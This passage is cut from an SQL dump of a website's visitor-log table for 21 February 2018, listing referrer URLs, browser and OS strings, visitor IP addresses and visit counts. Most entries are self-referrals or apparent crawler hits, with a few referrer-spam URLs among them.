'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.196','000',2,0),(23768,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.200','000',2,0),(23769,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.212','000',3,0),(23770,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.53','000',1,0),(23771,'2018-02-21','http://headpharmacy.com/','MSIE','Windows','6.0','','178.137.16.45','000',2,0),(23772,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.248','000',1,0),(23773,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.5','000',1,0),(23774,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.154','000',5,0),(23775,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.175','000',1,0),(23776,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.186','000',1,0),(23777,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.144','000',1,0),(23778,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.139','000',1,0),(23779,'2018-02-21','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.28','000',1,0),(23780,'2018-02-21','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.30','000',1,0),(23781,'2018-02-21','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.30','000',1,0),(23782,'2018-02-21','https://zphiblgz.org','Firefox','Windows','57.0','','192.198.80.227','000',3,0),(23783,'2018-02-21','http://zphiblgz.org/scholarship/','Chrome','Macintosh','64.0.3282.140','','71.179.100.71','000',1,0),(23784,'2018-02-21','https://vsdelke.ru/','Unknown','Unknown','Unknown','','178.137.162.218','000',2,0),(23785,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','150.95.187.60','000',3,0),(23786,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.88','000',1,0),(23787,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.210','000',3,0),(23788,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.56','000',3,0),(23789,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.114','000',1,0),(23790,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.71','000',2,0),(23791,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.87','000',1,0),(23792,'2018-02-21','https://zphiblgz.org','Firefox','Windows','40.1','','81.18.66.186','000',2,0),(23793,'2018-02-21','https://www.timer4web.com/','Firefox','Windows','55','','148.251.125.231','000',5,0),(23794,'2018-02-21','https://zphiblgz.org','Firefox','Windows','40.1','','112.198.79.42','000',2,0),(23795,'2018-02-21','https://zphiblgz.org','Chrome','Windows','64.0.3282.167','','50.225.39.77','000',2,0),(23796,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','67.205.13.248','000',1,0),(23797,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.90.166','000',2,0),(23798,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.90.164','000',1,0),(23799,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.91.216','000',2,0),(23800,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.88.27','000',2,0),(23801,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.95.29','000',1,0),(23802,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','184.168.193.152','000',1,0),(23803,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','37.187.143.98','000',1,0),(23804,'2018-02-21','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.27','000',1,0),(23805,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','94.130.88.20','000',1,0),(23806,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.119','000',1,0),(23807,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.110','000',2,0),(23808,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.222','000',1,0),(23809,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.187','000',1,0),(23810,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.114','000',1,0),(23811,'2018-02-21','https://pills24h.com/buy-paroxetine-online-without-prescription/','Opera','Windows','9.0','','178.137.162.218','000',2,0),(23812,'2018-02-21','https://zphiblgz.org','Firefox','Windows','40.1','','212.252.75.142','000',2,0),(23813,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.199','000',2,0),(23814,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.55','000',1,0),(23815,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.196','000',1,0),(23816,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.80','000',3,0),(23817,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.180','000',2,0),(23818,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.160','000',1,0),(23819,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.243','000',3,0),(23820,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.132','000',1,0),(23821,'2018-02-21','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.30','000',1,0),(23822,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.204','000',1,0),(23823,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.116','000',3,0),(23824,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.16','000',1,0),(23825,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.14','000',1,0),(23826,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.113','000',2,0),(23827,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.116','000',1,0),(23828,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.77','000',1,0),(23829,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.180','000',1,0),(23830,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.166','000',2,0),(23831,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.222','000',2,0),(23832,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.59','000',2,0),(23833,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.204','000',1,0),(23834,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.3','000',5,0),(23835,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.145','000',1,0),(23836,'2018-02-21','https://zphiblgz.org','Firefox','Windows','40.1','','176.32.17.193','000',2,0),(23837,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.210','000',1,0),(23838,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.105','000',3,0),(23839,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.199','000',1,0),(23840,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.20','000',2,0),(23841,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.115','000',2,0),(23842,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.226','000',1,0),(23843,'2018-02-21','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.19','000',1,0),(23844,'2018-02-21','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.32','000',1,0),(23845,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.89','000',1,0),(23846,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.114','000',1,0),(23847,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.83','000',1,0),(23848,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.202','000',1,0),(23849,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.206','000',2,0),(23850,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.97','000',2,0),(23851,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.187','000',1,0),(23852,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.177','000',3,0),(23853,'2018-02-21','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.30','000',1,0),(23854,'2018-02-21','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.30','000',1,0),(23855,'2018-02-21','http://zphiblgz.org/','WordPress','Unknown','Unknown','','192.0.89.241','000',2,0),(23856,'2018-02-21','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.30','000',1,0),(23857,'2018-02-21','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.30','000',1,0),(23858,'2018-02-21','https://www.bing.com/','Edge','Windows','16.16299','','4.14.61.2','000',2,0),(23859,'2018-02-21','https://www.google.com/','Chrome','Windows','63.0.3239.132','','152.26.199.38','000',1,0),(23860,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.221','000',3,0),(23861,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.217','000',1,0),(23862,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.52','000',1,0),(23863,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.197','000',1,0),(23864,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.117','000',1,0),(23865,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.42','000',1,0),(23866,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.68','000',1,0),(23867,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.115','000',2,0),(23868,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.118','000',1,0),(23869,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.201','000',1,0),(23870,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.88','000',1,0),(23871,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.151','000',2,0),(23872,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.1','000',1,0),(23873,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.21','000',1,0),(23874,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.180','000',1,0),(23875,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.176','000',1,0),(23876,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.196','000',1,0),(23877,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.118','000',2,0),(23878,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.69','000',2,0),(23879,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.116','000',3,0),(23880,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.82','000',1,0),(23881,'2018-02-21','https://www.google.com/','Firefox','Windows','52.0','','8.44.100.11','000',2,0),(23882,'2018-02-21','https://www.google.com/','Chrome','Windows','64.0.3282.167','','71.179.165.166','000',3,0),(23883,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.184','000',1,0),(23884,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.143','000',4,0),(23885,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.180','000',1,0),(23886,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.118','000',1,0),(23887,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.7','000',2,0),(23888,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.100','000',3,0),(23889,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.194','000',1,0),(23890,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.27','000',2,0),(23891,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.37','000',1,0),(23892,'2018-02-21','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',5,0),(23893,'2018-02-21','http://polyana-skazok.org.ua/','MSIE','Windows','6.0','','134.249.66.84','000',3,0),(23894,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.192','000',1,0),(23895,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.93','000',2,0),(23896,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.208','000',2,0),(23897,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.211','000',2,0),(23898,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.143','000',1,0),(23899,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.129','000',2,0),(23900,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.112','000',1,0),(23901,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.100','000',6,0),(23902,'2018-02-21','https://zphiblgz.org','Firefox','Windows','40.1','','189.49.241.112','000',2,0),(23903,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.232','000',3,0),(23904,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.6','000',2,0),(23905,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.227','000',1,0),(23906,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.165','000',3,0),(23907,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.18','000',1,0),(23908,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.203','000',3,0),(23909,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.205','000',2,0),(23910,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.52','000',2,0),(23911,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.202','000',1,0),(23912,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.38','000',3,0),(23913,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.253','000',1,0),(23914,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.86','000',2,0),(23915,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.66','000',1,0),(23916,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.129','000',1,0),(23917,'2018-02-21','https://zphiblgz.org/scholarship/','MSIE','Windows','11.0','','73.133.120.5','000',1,0),(23918,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.184','000',3,0),(23919,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.99','000',1,0),(23920,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.213','000',1,0),(23921,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.148','000',2,0),(23922,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.4','000',1,0),(23923,'2018-02-21','https://zphiblgz.org','Firefox','Windows','58.0','','76.80.85.162','000',13,0),(23924,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.212','000',3,0),(23925,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.192','000',1,0),(23926,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.90','000',4,0),(23927,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.83','000',1,0),(23928,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.117','000',2,0),(23929,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','95.211.94.107','000',1,0),(23930,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.25','000',1,0),(23931,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.205','000',2,0),(23932,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.182','000',3,0),(23933,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.172','000',1,0),(23934,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.17','000',1,0),(23935,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.250','000',1,0),(23936,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.221','000',1,0),(23937,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.198','000',2,0),(23938,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.218','000',1,0),(23939,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.24','000',1,0),(23940,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.40','000',1,0),(23941,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.19','000',2,0),(23942,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.30','000',1,0),(23943,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.71','000',2,0),(23944,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.194','000',1,0),(23945,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.15','000',2,0),(23946,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.207','000',1,0),(23947,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.177','000',1,0),(23948,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.208','000',2,0),(23949,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.171','000',1,0),(23950,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.179','000',1,0),(23951,'2018-02-21','https://mamasuper.prom.ua/','Unknown','Unknown','Unknown','','46.118.116.121','000',1,0),(23952,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.223','000',2,0),(23953,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.201','000',1,0),(23954,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.49','000',1,0),(23955,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.202','000',1,0),(23956,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.208','000',1,0),(23957,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.202','000',2,0),(23958,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.86','000',1,0),(23959,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.115','000',3,0),(23960,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.227','000',1,0),(23961,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.213','000',1,0),(23962,'2018-02-21','http://atyrau.xkaz.org/','MSIE','Windows','5.0','','134.249.48.151','000',2,0),(23963,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.109','000',1,0),(23964,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.169','000',1,0),(23965,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.23','000',1,0),(23966,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.216','000',2,0),(23967,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.226','000',2,0),(23968,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.29','000',1,0),(23969,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.211','000',1,0),(23970,'2018-02-21','https://zphiblgz.org','Edge','Windows','16.16299','','96.244.50.179','000',2,0),(23971,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.56','000',1,0),(23972,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.173','000',1,0),(23973,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.185','000',2,0),(23974,'2018-02-21','https://zphiblgz.org','Safari','iPad','11.0','','71.121.163.58','000',9,0),(23975,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','31.13.113.186','000',1,0),(23976,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','31.13.114.81','000',1,0),(23977,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','31.13.106.116','000',1,0),(23978,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','31.13.113.18','000',2,0),(23979,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','31.13.113.179','000',2,0),(23980,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','31.13.112.149','000',1,0),(23981,'2018-02-21','https://zphiblgz.org','MSIE','Windows','9.0','','34.209.175.228','000',3,0),(23982,'2018-02-21','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.89','','165.227.162.159','000',2,0),(23983,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.93.17','000',1,0),(23984,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.91.101','000',1,0),(23985,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.90.230','000',2,0),(23986,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.88.3','000',2,0),(23987,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.88.246','000',1,0),(23988,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.91.100','000',1,0),(23989,'2018-02-21','https://www.google.com/','Firefox','Macintosh','52.0','','71.179.88.19','000',3,0),(23990,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.206','000',2,0),(23991,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.66','000',1,0),(23992,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.193','000',2,0),(23993,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.200','000',3,0),(23994,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.39','000',2,0),(23995,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.117','000',2,0),(23996,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.123','000',2,0),(23997,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.52','000',5,0),(23998,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.119','000',1,0),(23999,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.118','000',4,0),(24000,'2018-02-21','https://zphiblgz.org','Chrome','Android','64.0.3282.137','','96.231.172.146','000',4,0),(24001,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.118','000',1,0),(24002,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.203','000',2,0),(24003,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.128','000',1,0),(24004,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.131','000',2,0),(24005,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.245','000',1,0),(24006,'2018-02-21','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.46.105','000',2,0),(24007,'2018-02-21','https://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.218','000',1,0),(24008,'2018-02-21','http://zphiblgz.org/scholarship/','Chrome','Macintosh','63.0.3239.132','','71.121.235.184','000',12,0),(24009,'2018-02-21','https://zphiblgz.org','Firefox','Windows','40.1','','115.99.2.44','000',2,0),(24010,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.69','000',1,0),(24011,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.209','000',2,0),(24012,'2018-02-21','https://zphiblgz.org','Chrome','Macintosh','64.0.3282.167','','100.36.84.244','000',4,0),(24013,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.235','000',1,0),(24014,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.114','000',2,0),(24015,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.150','000',1,0),(24016,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.96','000',1,0),(24017,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.178','000',1,0),(24018,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.95.31','000',2,0),(24019,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.90.170','000',1,0),(24020,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.198','000',1,0),(24021,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.88.23','000',1,0),(24022,'2018-02-21','https://zphiblgz.org','Firefox','Windows','40.1','','88.61.26.251','000',2,0),(24023,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.125','000',2,0),(24024,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.72','000',1,0),(24025,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.107','000',1,0),(24026,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.213','000',1,0),(24027,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.215','000',1,0),(24028,'2018-02-21','https://zphiblgz.org','Safari','Macintosh','8.0','','54.85.182.120','000',1,0),(24029,'2018-02-21','https://zphiblgz.org','Chrome','Macintosh','64.0.3282.167','','71.179.100.71','000',2,0),(24030,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.217','000',2,0),(24031,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.215','000',2,0),(24032,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.7','000',1,0),(24033,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.72','000',1,0),(24034,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.50','000',1,0),(24035,'2018-02-21','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','52.165.148.51','000',1,0),(24036,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.54','000',1,0),(24037,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.38','000',1,0),(24038,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.198','000',1,0),(24039,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.122','000',1,0),(24040,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.114','000',1,0),(24041,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.117','000',1,0),(24042,'2018-02-21','https://studentguide.ru/','MSIE','Windows','6.0','','37.115.112.228','000',1,0),(24043,'2018-02-21','http://03p.info/','Opera','Windows','7.54','','178.137.16.45','000',2,0),(24044,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.114','000',1,0),(24045,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.192','000',1,0),(24046,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.36','000',1,0),(24047,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.111','000',1,0),(24048,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.